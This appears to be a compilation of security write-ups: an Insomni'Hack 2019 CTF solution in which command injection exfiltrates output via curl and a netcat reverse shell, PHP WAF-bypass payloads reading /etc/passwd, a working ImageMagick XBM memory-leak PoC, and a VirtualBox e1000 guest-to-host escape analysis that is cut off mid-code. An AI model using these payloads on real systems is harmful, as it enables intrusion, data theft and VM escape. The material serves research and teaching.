Insomni’Hack Teaser 2019 — exploit-space

Original text by @Ghostx_0

CTF URL: https://teaser.insomnihack.ch/

Solves: 7 / Points: 500 / Category: Web

Challenge description

We have created a little exploit space and made it accessible for everyone! Have fun! You can get your own exploit space here.

Challenge resolution

This challenge was the most realistic yet fun web challenge of this Insomni’Hack teaser, as it presented nothing less than an installation of the ResourceSpace open source digital asset management software.

The first step, like for any challenge, was the reconnaissance phase.

As indicated in the commented HTML code, the installed version of the ResourceSpace was the version 8.6.12117:

ResourceSpace Version

This software being open source, we can audit its source code in order to find vulnerabilities we can exploit.

We can then look at the Git commits logs to find juicy commit messages like this one:

Commit logs

Looking at the diff view for this commit, reveals the vulnerable entry point in the “/plugins/pdf_split/pages/pdf_split.php” page being passed to the run_command() function:

Gif diff

The fix introduced by this commit just sanitizes the user inputs by applying the escapeshellarg() function:

escapeshellarg function

Using the semi-colon character thus completes the comnand line, allowing us to execute arbitrary commands on the web server. However, as we don’t have a direct visible output, we need to use an HTTP server such as the Burp collaborator listening for incomming requests.

The following POST request uses the curl binary in order to send the result of the whoami command to our web server:

POST request whoami

Immediately after, we see the result of our command in our Burp collaborator interactions panel:

whoami

The final step is to locate and get the flag:

POST request getflag

Wait… What? There’s a captcha that prevents non-interactive access:

captcha

We actually need to obtain an interactive reverse shell on this server.

To do so we can download the netcat binary from our web server using curl, add execution permission and run it:

reverse shell 1

As expected, the web server just connects back to our server, therefore providing us with an interactive reverse shell:

reverse shell 2

And finally we can solve the captcha and get the flag:

flag

Реклама

How To Exploit PHP Remotely To Bypass Filters & WAF Rules

( Original text by Andrea Menin )

In the last three articles, I’ve been focused on how to bypass WAF rule set in order to exploit a remote command execution. In this article, I’ll show you how many possibilities PHP gives us in order to exploit a remote code execution bypassing filters, input sanitization, and WAF rules. Usually when I write articles like this one people always ask “really people write code like this?” and typically they’re not pentesters. Let me answer before you ask me again : YES and YES.

This is the first of two vulnerable PHP scripts that I’m going to use for all tests. This script is definitely too easy and dumb but it’s just to reproducing a remote code execution vulnerability scenario (probably in a real scenario, you’ll do a little bit more work to reach this situation):

first PHP script

Obviously, the sixth line is pure evil. The third line tries to intercept functions like systemexec or passthru (there’re many other functions in PHP that can execute system commands but let’s focus on these three). This script is running in a web server behind the CloudFlare WAF (as always, I’m using CloudFlare because it’s easy and widely known by the people, this doesn’t mean that CloudFlare WAF is not secure. All other WAF have the same issues, more or less…). The second script will be behind ModSecurity + OWASP CRS3.

Trying to read /etc/passwd

For the first test, I try to read /etc/passwd using system() function by the request /cfwaf.php?code=system(“cat /etc/passwd”);

CloudFlare WAF blocks my first try

As you can see, CloudFlare blocks my request (maybe because the “/etc/passwd”) but, if you have read my last article about uninitialized variable, I can easily bypass with something like cat /etc$u/passwd

CloudFlare WAF bypassed but input sanitization blocks the request

CloudFlare WAF has been bypassed but the check on the user’s input blocked my request because I’m trying to use the “system” function. Is there a syntax that let me use the system function without using the “system” string? Let’s take a look at the PHP documentation about strings!

PHP String escape sequences

\[0–7]{1,3} sequence of characters in octal notation, which silently overflows to fit in a byte (e.g. “\400” === “\000”)

\x[0–9A-Fa-f]{1,2} sequence of characters in hexadecimal notation (e.g. “\x41″)

\u{[0–9A-Fa-f]+} sequence of Unicode codepoint, which will be output to the string as that codepoint’s UTF-8 representation (added in PHP 7.0.0)

Not everyone knows that PHP has a lot of syntaxes for representing a string, and with the “PHP Variable functions” it becomes our Swiss Army knife for bypassing filters and rules.

PHP Variable functions

PHP supports the concept of variable functions. This means that if a variable name has parentheses appended to it, PHP will look for a function with the same name as whatever the variable evaluates to, and will attempt to execute it. Among other things, this can be used to implement callbacks, function tables, and so forth.

this means that syntaxes like $var(args); and “string”(args); are equal to function(args);. If I can call a function by using a variable or a string, it means that I can use an escape sequence instead of the name of a function. Here an example:

the third syntax is an escape sequence of characters in a hexadecimal notation that PHP converts to the string “system” and then it converts to the function system with the argument “ls”. Let’s try with our vulnerable script:

user input sanitization bypassed

This technique doesn’t work for all PHP functions, variable functions won’t work with language constructs such as echoprintunset()isset()empty()includerequire and the like. Utilize wrapper functions to make use of any of these constructs as variable functions.

Improve the user input sanitization

What happens if I exclude characters like double and single quotes from the user input on the vulnerable script? Is it possible to bypass it even without using double quotes? Let’s try:

prevent using “ and ‘ on $_GET[code]

as you can see on the third line, now the script prevents the use of  and  inside the $_GET[code] querystring parameter. My previous payload should be blocked now:

Now my vulnerable script prevents using “

Luckily, in PHP, we don’t always need quotes to represent a string. PHP makes you able to declare the type of an element, something like $a = (string)foo; in this case, $a contains the string “foo”. Moreover, whatever inside round brackets without a specific type declaration, is treated as a string:

In this case, we’ve two ways to bypass the new filter: the first one is to use something like (system)(ls); but we can’t use “system” inside the code parameter, so we can concatenate strings like (sy.(st).em)(ls);. The second one is to use the $_GETvariable. If I send a request like ?a=system&b=ls&code=$_GET[a]($_GET[b]); the result is: $_GET[a] will be replaced with the string “system” and $_GET[b] will be replaced with the string “ls” and I’ll able to bypass all filters!

Let’s try with the first payload (sy.(st).em)(whoami);

WAF bypassed, filter bypassed

and the second payload ?a=system&b=cat+/etc&c=/passwd&code=$_GET[a]($_GET[b].$_GET[c]);

WAF bypassed, filter bypassed

In this case is not useful, but you can even insert comments inside the function name and inside the arguments (this could be useful in order to bypass WAF Rule Set that blocks specific PHP function names). All following syntaxes are valid:

get_defined_functions

This PHP function returns a multidimensional array containing a list of all defined functions, both built-in (internal) and user-defined. The internal functions will be accessible via $arr[“internal”], and the user-defined ones using $arr[“user”]. For example:

This could be another way to reach the system function without using its name. If I grep for “system” I can discover its index number and use it as a string for my code execution:

1077 = system

obviously, this should work against our CloudFlare WAF and script filters:

bypass using get_defined_functions

Array of characters

Each string in PHP can be used as an array of characters (almost like Python does) and you can refer to a single string character with the syntax $string[2] or $string[-3]. This could be another way to elude rules that block PHP functions names. For example, with this string $a=”elmsty/ “; I can compose the syntax system(“ls /tmp”);

If you’re lucky you can find all the characters you need inside the script filename. With the same technique, you can pick all chars you need with something like (__FILE__)[2]:

OWASP CRS3

Let me say that with the OWASP CRS3 all becomes harder. First, with the techniques seen before I can bypass only the first paranoia level, and this is amazing! Because the Paranoia Level 1 is just a little subset of rules of what we can find in the CRS3, and this level is designed for preventing any kind of false positive. With a Paranoia Level 2 all things becomes hard because of the rule 942430 “Restricted SQL Character Anomaly Detection (args): # of special characters exceeded”. What I can do is just execute a single command without arguments like “ls”, “whoami”, etc.. but I can’t execute something like system(“cat /etc/passwd”) as done with CloudFlare WAF:

Previous Episodes

Web Application Firewall Evasion Techniques #1
https://medium.com/secjuice/waf-evasion-techniques-718026d693d8

Web Application Firewall Evasion Techniques #2
https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0

Web Application Firewall Evasion Techniques #3
https://www.secjuice.com/web-application-firewall-waf-evasion/

Yet another memory leak in ImageMagick or how to exploit CVE-2018–16323.

( Original text by barracud4_ )

Hi, in this article we’ll talk about ImageMagick vulnerabilities.

TL;DR:
PoC generator for CVE-2018–16323 (Memory leakage via XBM images in ImageMagick)

What is the ImageMagick? From imagemagick.org:

Use ImageMagick® to create, edit, compose, or convert bitmap images. It can read and write images in a variety of formats (over 200) including PNG, JPEG, GIF, HEIC, TIFF, DPX, EXR, WebP, Postscript, PDF, and SVG. Use ImageMagick to resize, flip, mirror, rotate, distort, shear and transform images, adjust image colors, apply various special effects, or draw text, lines, polygons, ellipses and Bézier curves.

This is a very rich library for processing images. If you google “how to resize a picture in php” or “how to crop an image”, then most likely you will find advice on how to use ImageMagick. This library has long had security problems. And today we will look at a fresh vulnerability and recall some old ones.


Part 1 — Yet another memory leak

For the past two years vulnerabilities in ImageMagick libraries have appeared almost every month. Fortunately, many of them are some kind of not applicable DoS, which does not pose serious security problems. But recently we have noticed an interesting CVE-2018–16323.

Sounds easy! But we didn’t find any information about exploit for this vulnerability.

Look at the commit referenced to the CVE:

“XBM coder leaves the hex image data uninitialized if hex value of the pixel is negative“

Hmm.. Let’s explore the XBM file format. A common XBM image looks like this:

Which is very similar to C code. This format is very old and was used in X Window System to store cursor and icon bitmaps used in the X GUI. Each value in keyboard16_bits array represents 8 pixels, each pixel is a single bit and encodes one of two colors — black or white. So there are no negative pixels as one pixel has only two possible values. Hereinafter we will call that array as XBM body array.

Let’s look closer at the ImageMagick code and find out what a “pixel is negative” means at commit details. We need a ReadXBMImage() function. This function reads an image and prepares data for image processing. Seems like variable image contains the image data being processed (Line 225).

Next, at lines 344–348 there is a memory allocation and pointer data now points to the allocated memory start address. Also pointer points to the same address.

Memory allocation

Next 352–360 and 365–371, same code but for different versions of XBM image. As can be seen from the commit both branches are equally vulnerable, so we will consider just one of them. XBM body array reading occurs in the function XBMInteger() which returns an int to variable . Further at line 358the value stored in variable c is put to variable by p pointer, then the pointer is incremented.

Allocated memory filling

In the commit we see that in the previous version variable was checked for negative value, and if it was negative then the loop ended with a break, and that’s why memory leak appeared. If the first value of XBM body array is negative then all allocated memory remains uninitialized and may contain sensitive data from memory, which will be further processed and a new image will be generated from this data. In patched version it was changed, now if value of XBM body array is negative then ImageMagick throws an error.

Now let’s take a closer look at the XBMInteger() function. It takes a pointer image and pointer hex_digits as arguments. The latter is an array which is initilized at line 305. This function maps allowed values to hex values in XBM body array. XBMInteger() reads next byte defined in XBM body array and puts it to unsigned int variable value. There is an interesting moment, this function reads hex-symbols until the stop token appears. This means that we can specify hex values of arbitrary length and so instead of the expected range between 0–255 values for char we can set any unsigned int value which will be stored in variable value. And next fatal fact is that variable valueconverted to signed int… Bingo!

Convert unsigned int to int is a bad idea

So we just need to set a value to XBM body array which will be converted to negative int. It is any value above 2,147,483,647 or 0x80000000 in hex. That’s the whole PoC:

#define test_width 500
#define test_height 500
static char test_bits[] = {
0x80000001, };

The amount of leaked memory depends on how you set the height and width parameters. If you set 500×500, therefore, 31250 (500*500/8) bytes will leak! But it depends on how application uses ImageMagick, it may be that it cuts the image to a certain height and width.

While we were testing this PoC, we encountered a problem. Not all the ImageMagick versions below 7.0.8–9 appeared to be vulnerable as described at cvedetails. We found another commit that fixed another vulnerability — CVE-2017–14175 which is a DoS vulnerability for XBM Images processing. And as you can see, it was this particular commit that brought the vulnerability into the code.

Okay let’s try the PoC. Let’s install one of the vulnerable versions (e.g. 6.9.9–51). Now, running convert poc.xbm poc.png we will call processing XBM images in xbm.c file. And therefore call vulnerable code.

The resulting image should be like this:

Image contains leaked memory

You can see some noise on the resulting image, this is a leaked memory, each black or white pixel is a bit of information from leaked memory. If you repeat convert, then you will likely get another image, because another memory chunk will be caught.

What do we need to extract leaked memory bytes?

Simply convert it back, convert poc.png leak.xbm, now we see leaked memory bytes in XBM body array and this is very easy to parse format. Extract it and get leaked memory bytes.

So,

  1. Generate a PoC;
  2. Upload it to your avatar on vulnerable application;
  3. Save resulting png/jpg/gif image;
  4. Extract data from image.

ttffdd wrote a simple easy to use tool for this vulnerability called XBadManners. It generates a PoC and recovers leaked data from image.

Notice! That ImageMagick is a smart library and you can upload a poc.pngwhich contains XBM image data to the server and if the image type is not checked properly, then ImageMagick will process poc.png as an XBM image. So if you just check the filetype of the uploaded file for the “*.png” matches, then this will not save you.


Part 2 — Is ImageMagick secure?

Short answer — probably not.

It is not the first serious vulnerability found in ImageMagick software. There are plenty of vulnerabilities. ImageMagick has almost 500 known fixed vulnerabilities! Every month there are new vulnerabilities found that may be difficult to exploit or not applicable, and a couple of times a year some serious vulnerabilities with high impact show up.

Here is a top list of widely known ImageMagick vulnerabilities.

ImageTragick. The most famous series of vulnerabilities in ImageMagick. It includes RCESSRFLocal File Read/Move/Delete in svg and mvg files. It was discovered in April 2016 by stewie and Nikolay Ermishkin.

  • CVE-2016–3714 — RCE
  • CVE-2016–3718 — SSRF
  • CVE-2016–3715 — File deletion
  • CVE-2016–3716 — File moving
  • CVE-2016–3717 — Local file read

Patch was available in 6.9.3–9 released 2016–04–30 ImageMagick version. This vulnerability was quite popular with bughunters:

CVE-2017–15277 a.k.a. gifoeb. Discovered by Emil Lerner in 2017 July. This vulnerability is a memory leakage in GIF images processing. ImageMagick leaves the palette uninitialized if neither global nor local palette is present, and a memory leak occurs exactly through the palette. This rather limited the length of the leaked data. This vulnerability was also popular with bughunters.

GhostScript Type Confusion RCE (CVE-2017–8291). Was discovered in May 2017. It’s not an ImageMagick vulnerability, but it affects it as ImageMagick uses ghostscript to handle certain types of images with PostScript, i.e. EPS, PDF files.

CVE-2018–16509, another RCE in GhostScript, was published in August 2018. Also affects ImageMagick as it is in GhostScript like the previous bug.

How many other vulnerabilities that carry serious security problems remain unknown? We do not know. We have specially prepared a small history of ImageMagick security infographic.

History of ImageMagick security

Part 3 — How can we use ImageMagick in a secure way?

Stop using ImageMagick? Maybe, but..

We do not tell you to stop using the ImageMagick. We advise you to do this in a safe way to reduce information security risks.

First, as you may have noticed ImageMagick has a lot of vulnerabilities constantly appearing and therefore it is also updated frequently. If you use ImageMagick then watch for new versions and make sure the latest version is installed at all times. Notice that ImageMagick is not frequently updated in official repositories so it may contain old vulnerable versions. It is best to install stable ImageMagick version from source code.

But as you can see from our example, fixing old vulnerabilities brings new vulnerabilities 🙂

Therefore, updating ImageMagick may not save you.

Best practice for ImageMagick is to run it in an isolated environment, like Docker. Set minimum required rights for the service that uses ImageMagick. Put it in an isolated network segment with minimal network rights. And use this isolated environment ONLY for a specific task of processing custom user images using ImageMagick.

Also ImageMagick have configured security policy.

Here you can find a detailed guide on the security of ImageMagick from developers.

 

Virtualbox e1000 0day

Why

I like VirtualBox and it has nothing to do with why I publish a 0day vulnerability. The reason is my disagreement with contemporary state of infosec, especially of security research and bug bounty:

  1. Wait half a year until a vulnerability is patched is considered fine.
  2. In the bug bounty field these are considered fine:
    1. Wait more than month until a submitted vulnerability is verified and a decision to buy or not to buy is made.
    2. Change the decision on the fly. Today you figured out the bug bounty program will buy bugs in a software, week later you come with bugs and exploits and receive «not interested».
    3. Have not a precise list of software a bug bounty is interested to buy bugs in. Handy for bug bounties, awkward for researchers.
    4. Have not precise lower and upper bounds of vulnerability prices. There are many things influencing a price but researchers need to know what is worth to work on and what is not.
  3. Delusion of grandeur and marketing bullshit: naming vulnerabilities and creating websites for them; making a thousand conferences in a year; exaggerating importance of own job as a security researcher; considering yourself «a world saviour». Come down, Your Highness.

I’m exhausted of the first two, therefore my move is full disclosure. Infosec, please move forward.

General Information

Vulnerable software: VirtualBox 5.2.20 and prior versions.

Host OS: any, the bug is in a shared code base.

Guest OS: any.

VM configuration: default (the only requirement is that a network card is Intel PRO/1000 MT Desktop (82540EM) and a mode is NAT).

How to protect yourself

Until the patched VirtualBox build is out you can change the network card of your virtual machines to PCnet (either of two) or to Paravirtualized Network. If you can’t, change the mode from NAT to another one. The former way is more secure.

Introduction

A default VirtualBox virtual network device is Intel PRO/1000 MT Desktop (82540EM) and the default network mode is NAT. We will refer to it E1000.

The E1000 has a vulnerability allowing an attacker with root/administrator privileges in a guest to escape to a host ring3. Then the attacker can use existing techniques to escalate privileges to ring 0 via /dev/vboxdrv.

Vulnerability Details

E1000 101

To send network packets a guest does what a common PC does: it configures a network card and supplies network packets to it. Packets are of data link layer frames and of other, more high level headers. Packets supplied to the adaptor are wrapped in Tx descriptors (Tx means transmit). The Tx descriptor is data structure described in the 82540EM datasheet (317453006EN.PDF, Revision 4.0). It stores such metainformation as packet size, VLAN tag, TCP/IP segmentation enabled flags and so on.

The 82540EM datasheet provides for three Tx descriptor types: legacy, context, data. Legacy is deprecated I believe. The other two are used together. The only thing we care of is that context descriptors set the maximum packet size and switch TCP/IP segmentation, and that data descriptors hold physical addresses of network packets and their sizes. The data descriptor’s packet size must be lesser than the context descriptor’s maximum packet size. Usually context descriptors are supplied to the network card before data descriptors.

To supply Tx descriptors to the network card a guess writes them to Tx Ring. This is a ring buffer residing in physical memory at a predefined address. When all descriptors are written down to Tx Ring the guest updates E1000 MMIO TDT register (Transmit Descriptor Tail) to tell the host there are new descriptors to handle.

Input

Consider the following array of Tx descriptors:

[context_1, data_2, data_3, context_4, data_5]

Let’s assign their structure fields as follows (field names are hypothetical to be human readable but directly map to the 82540EM specification):

context_1.header_length = 0
context_1.maximum_segment_size = 0x3010
context_1.tcp_segmentation_enabled = true

data_2.data_length = 0x10
data_2.end_of_packet = false
data_2.tcp_segmentation_enabled = true

data_3.data_length = 0
data_3.end_of_packet = true
data_3.tcp_segmentation_enabled = true

context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true

data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

We will learn why they should be like that in our step-by-step analysis.

Root Cause Analysis

[context_1, data_2, data_3] Processing

Let’s assume the descriptors above are written to the Tx Ring in the specified order and TDT register is updated by the guest. Now the host will execute e1kXmitPending function in src/VBox/Devices/Network/DevE1000.cpp file (most of comments are and will be stripped for the sake of readability):

static int e1kXmitPending(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
        while (!pThis->fLocked && e1kTxDLazyLoad(pThis))
        {
            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

e1kTxDLazyLoad will read all the 5 Tx descriptors from the Tx Ring. Then e1kLocateTxPacket is called for the first time. This function iterates through all the descriptors to set up an initial state but does not actually handle them. In our case the first call to e1kLocateTxPacket will handle context_1, data_2, and data_3 descriptors. The two remaining descriptors, context_4 and data_5, will be handled at the second iteration of the while loop (we will cover the second iteration in the next section). This two-part array division is crucial to trigger the vulnerability so let’s figure out why.

e1kLocateTxPacket looks like this:

static bool e1kLocateTxPacket(PE1KSTATE pThis)
{
...
    for (int i = pThis->iTxDCurrent; i < pThis->nTxDFetched; ++i)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[i];
        switch (e1kGetDescType(pDesc))
        {
            case E1K_DTYP_CONTEXT:
                e1kUpdateTxContext(pThis, pDesc);
                continue;
            case E1K_DTYP_LEGACY:
                ...
                break;
            case E1K_DTYP_DATA:
                if (!pDesc->data.u64BufAddr || !pDesc->data.cmd.u20DTALEN)
                    break;
                ...
                break;
            default:
                AssertMsgFailed(("Impossible descriptor type!"));
        }

The first descriptor (context_1) is of E1K_DTYP_CONTEXT so e1kUpdateTxContext function is called. This function updates a TCP Segmentation Context if TCP Segmentation is enabled for the descriptor. It is true for context_1 so the TCP Segmentation Context will be updated. (What the TCP Segmentation Context Update actually is, is not important, and we will use this just to refer the code below).

The second descriptor (data_2) is of E1K_DTYP_DATA so several actions unnecessary for the discussion will be performed.

The third descriptor (data_3) is also of E1K_DTYP_DATA but since data_3.data_length == 0 no action is performed.

At the moment the three descriptors are initially processed and the two remain. Now the thing: after the switch statement there is a check wheter a descriptor’s end_of_packet field was set. It is true for data_3 descriptor (data_3.end_of_packet == true). The code does some actions and returns from the function:

        if (pDesc->legacy.cmd.fEOP)
        {
            ...
            return true;
        }

If data_3.end_of_packet would been false then the remaining context_4 and data_5 descriptors would be processed, and the vulnerability would been bypassed. Below you’ll see why that return from the function leads to the bug.

At the end of e1kLocateTxPacket function we have the following descriptors ready to unwrap network packets from and to send to a network: context_1, data_2, data_3. Then the inner loop of e1kXmitPending calls e1kXmitPacket. This functions iterates through all the descriptors (5 in our case) to actually process them:

static int e1kXmitPacket(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
    while (pThis->iTxDCurrent < pThis->nTxDFetched)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[pThis->iTxDCurrent];
        ...
        rc = e1kXmitDesc(pThis, pDesc, e1kDescAddr(TDBAH, TDBAL, TDH), fOnWorkerThread);
        ...
        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;
    }

For each descriptor e1kXmitDesc function is called:

static int e1kXmitDesc(PE1KSTATE pThis, E1KTXDESC *pDesc, RTGCPHYS addr,
                       bool fOnWorkerThread)
{
...
    switch (e1kGetDescType(pDesc))
    {
        case E1K_DTYP_CONTEXT:
            ...
            break;
        case E1K_DTYP_DATA:
        {
            ...
            if (pDesc->data.cmd.u20DTALEN == 0 || pDesc->data.u64BufAddr == 0)
            {
                E1kLog2(("% Empty data descriptor, skipped.\n", pThis->szPrf));
            }
            else
            {
                if (e1kXmitIsGsoBuf(pThis->CTX_SUFF(pTxSg)))
                {
                    ...
                }
                else if (!pDesc->data.cmd.fTSE)
                {
                    ...
                }
                else
                {
                    STAM_COUNTER_INC(&pThis->StatTxPathFallback);
                    rc = e1kFallbackAddToFrame(pThis, pDesc, fOnWorkerThread);
                }
            }
            ...

The first descriptor passed to e1kXmitDesc is context_1. The function does nothing with context descriptors.

The second descriptor passed to e1kXmitDesc is data_2. Since all of our data descriptors have tcp_segmentation_enable == true (pDesc->data.cmd.fTSE above) we call e1kFallbackAddToFrame where there will be an integer underflow while data_5 is processed.

static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc, bool fOnWorkerThread)
{
    ...
    uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS;

    /*
     * Carve out segments.
     */
    int rc = VINF_SUCCESS;
    do
    {
        /* Calculate how many bytes we have left in this TCP segment */
        uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            /* This descriptor fits completely into current segment */
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }
        else
        {
            ...
        }

        pDesc->data.u64BufAddr    += cb;
        pDesc->data.cmd.u20DTALEN -= cb;
    } while (pDesc->data.cmd.u20DTALEN > 0 && RT_SUCCESS(rc));

    if (pDesc->data.cmd.fEOP)
    {
        ...
        pThis->u16TxPktLen = 0;
        ...
    }

    return VINF_SUCCESS; /// @todo consider rc;
}

The most important variables here are u16MaxPktLen, pThis->u16TxPktLen, and pDesc->data.cmd.u20DTALEN.

Let’s draw a table where values of these variables are specified before and after execution of e1kFallbackAddToFrame function for the two data descriptors.

Tx Descriptor Before/After u16MaxPktLen pThis->u16TxPktLen pDesc->data.cmd.u20DTALEN
data_2 Before 0x3010 0 0x10
After 0x3010 0x10 0
data_3 Before 0x3010 0x10 0
After 0x3010 0x10 0

You just need to note that when data_3 is processed pThis->u16TxPktLen equals to 0x10.

Next is the most important part. Please look again at the end of the snippet of e1kXmitPacket:

        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;

Since data_3 type != E1K_DTYP_CONTEXT and data_3.end_of_packet == true, we break from the loop despite the fact that there are context_4 and data_5 to be processed. Why is it important? The key to understand the vulnerability is to understand that all context descriptors are processed before data descriptors. Context descriptors are processed during the TCP Segmentation Context Update in e1kLocateTxPacket. Data descriptors are processed later in the loop inside e1kXmitPacket function. The developer intention was to forbid changing u16MaxPktLen after some data was processed to prevent integer underflows in the code:

uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;

But we are able to bypass this protection: recall that in e1kLocateTxPacket we forced the function to return because of data_3.end_of_packet == true. And because of that we have two descriptors (context_4 and data_5) left to be processed despite the fact that pThis->u16TxPktLen is 0x10, not 0. So there is a possibility to change u16MaxPktLen using context_4.maximum_segment_size to make the integer underflow.

[context_4, data_5] Processing

Now when the first three descriptors were processed we again arrive to the inner loop of e1kXmitPending:

            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

Here we call e1kLocateTxPacket do the initial processing of context_4 and data_5 descriptors. It has been said that we can set context_4.maximum_segment_size to a size lesser than the size of data already read i.e. lesser than 0x10. Recall our input Tx descriptors:

context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true

data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

As a result of the call to e1kLocateTxPacket we have the maximum segment size equals to 0xF, whereas the size of data already read is 0x10.

Finally, when processing data_5 we again arrive to e1kFallbackAddToFrame and have the following variable values:

Tx Descriptor Before/After u16MaxPktLen pThis->u16TxPktLen pDesc->data.cmd.u20DTALEN
data_5 Before 0xF 0x10 0x4188
After

And therefore we have an integer underflow:

uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
=>
uint32_t cb = 0xF - 0x10 = 0xFFFFFFFF;

This makes the following check to be true since 0xFFFFFFFF > 0x4188:

        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }

e1kFallbackAddSegment function will be called with size 0x4188. Without the vulnerability it’s impossible to call e1kFallbackAddSegment with a size greater than 0x4000 because, during the TCP Segmentation Context Update in e1kUpdateTxContext, there is a check that the maximum segment size is less or equal to 0x4000:

DECLINLINE(void) e1kUpdateTxContext(PE1KSTATE pThis, E1KTXDESC *pDesc)
{
...
        uint32_t cbMaxSegmentSize = pThis->contextTSE.dw3.u16MSS + pThis->contextTSE.dw3.u8HDRLEN + 4; /*VTAG*/
        if (RT_UNLIKELY(cbMaxSegmentSize > E1K_MAX_TX_PKT_SIZE))
        {
            pThis->contextTSE.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - pThis->contextTSE.dw3.u8HDRLEN - 4; /*VTAG*/
            ...
        }

Buffer Overflow

We have called e1kFallbackAddSegment with size 0x4188. How this can be abused? There are at least two possibilities I found. Firstly, data will be read from the guest into a heap buffer:

static int e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr, uint16_t u16Len, bool fSend, bool fOnWorkerThread)
{
    ...
    PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
                      pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);

Here pThis->aTxPacketFallback is the buffer of size 0x3FA0 and u16Len is 0x4188 — an obvious overflow that can lead, for example, to a function pointers overwrite.

Secondly, if we dig deeper we found that e1kFallbackAddSegment calls e1kTransmitFrame that can, with a certain configuration of E1000 registers, call e1kHandleRxPacket function. This function allocates a stack buffer of size 0x4000 and then copies data of a specified length (0x4188 in our case) to the buffer without any check:

static int e1kHandleRxPacket(PE1KSTATE pThis, const void *pvBuf, size_t cb, E1KRXDST status)
{
#if defined(IN_RING3)
    uint8_t   rxPacket[E1K_MAX_RX_PKT_SIZE];
    ...
    if (status.fVP)
    {
        ...
    }
    else
        memcpy(rxPacket, pvBuf, cb);

As you see, we turned an integer underflow to a classical stack buffer overflow. The two overflows above — heap and stack ones — are used in the exploit.

Exploit

The exploit is Linux kernel module (LKM) to load in a guest OS. The Windows case would require a driver differing from the LKM just by an initialization wrapper and kernel API calls.

Elevated privileges are required to load a driver in both OSs. It’s common and isn’t considered an insurmountable obstacle. Look at Pwn2Own contest where researcher use exploit chains: a browser opened a malicious website in the guest OS is exploited, a browser sandbox escape is made to gain full ring 3 access, an operating system vulnerability is exploited to pave a way to ring 0 from where there are anything you need to attack a hypervisor from the guest OS. The most powerful hypervisor vulnerabilities are for sure those that can be exploited from guest ring 3. There in VirtualBox is also such code that is reachable without guest root privileges, and it’s mostly not audited yet.

The exploit is 100% reliable. It means it either works always or never because of mismatched binaries or other, more subtle reasons I didn’t account. It works at least on Ubuntu 16.04 and 18.04 x86_64 guests with default configuration.

Exploitation Algorithm

  1. An attacker unloads e1000.ko loaded by default in Linux guests and loads the exploit’s LKM.
  2. The LKM initializes E1000 according to the datasheet. Only the transmit half is initialized since there is no need for the receive half.
  3. Step 1: information leak.
    1. The LKM disables E1000 loopback mode to make stack buffer overflow code unreachable.
    2. The LKM uses the integer underflow vulnerability to make the heap buffer overflow.
    3. The heap buffer overflow allows for use E1000 EEPROM to write two any bytes relative to a heap buffer in 128 KB range. Hence the attacker gains a write primitive.
    4. The LKM uses the write primitive 8 times to write bytes to ACPI (Advanced Configuration and Power Interface) data structure on heap. Bytes are written to an index variable of a heap buffer from which a single byte will be read. Since the buffer size is lesser than maximum index number (255) the attacker can read past the buffer, hence he/she gains a read primitive.
    5. The LKM uses the read primitive 8 times to access ACPI and obtain 8 bytes from the heap. Those bytes are pointer of VBoxDD.so shared library.
    6. The LKM subtracts RVA from the pointer to obtain VBoxDD.so image base.
  4. Step 2: stack buffer overflow.
    1. The LKM enabled E1000 loopback mode to make stack buffer overflow code reachable.
    2. The LKM uses the integer underflow vulnerability to make the heap buffer overflow and the stack buffer overflow. Saved return address (RIP/EIP) is overwritten. The attacker gains control.
    3. ROP chain is executed to execute a shellcode loader.
  5. Step 3: shellcode.
    1. The shellcode loader copies a shellcode from the stack next to itself. The shellcode is executed.
    2. The shellcode does fork and execve syscalls to spawn an arbitrary process on the host side.
    3. The parent process does process continuation.
  6. The attacker unloads the LKM and loads e1000.ko back to allow the guest to use network.

Initialization

The LKM maps physical memory regarding to E1000 MMIO. Physical address and size are predefined by the hypervisor.

void* map_mmio(void) {
    off_t pa = 0xF0000000;
    size_t len = 0x20000;

    void* va = ioremap(pa, len);
    if (!va) {
        printk(KERN_INFO PFX"ioremap failed to map MMIO\n");
        return NULL;
    }

    return va;
}

Then E1000 general purpose registers are configured, Tx Ring memory is allocated, transmit registers are configured.

void e1000_init(void* mmio) {
    // Configure general purpose registers

    configure_CTRL(mmio);

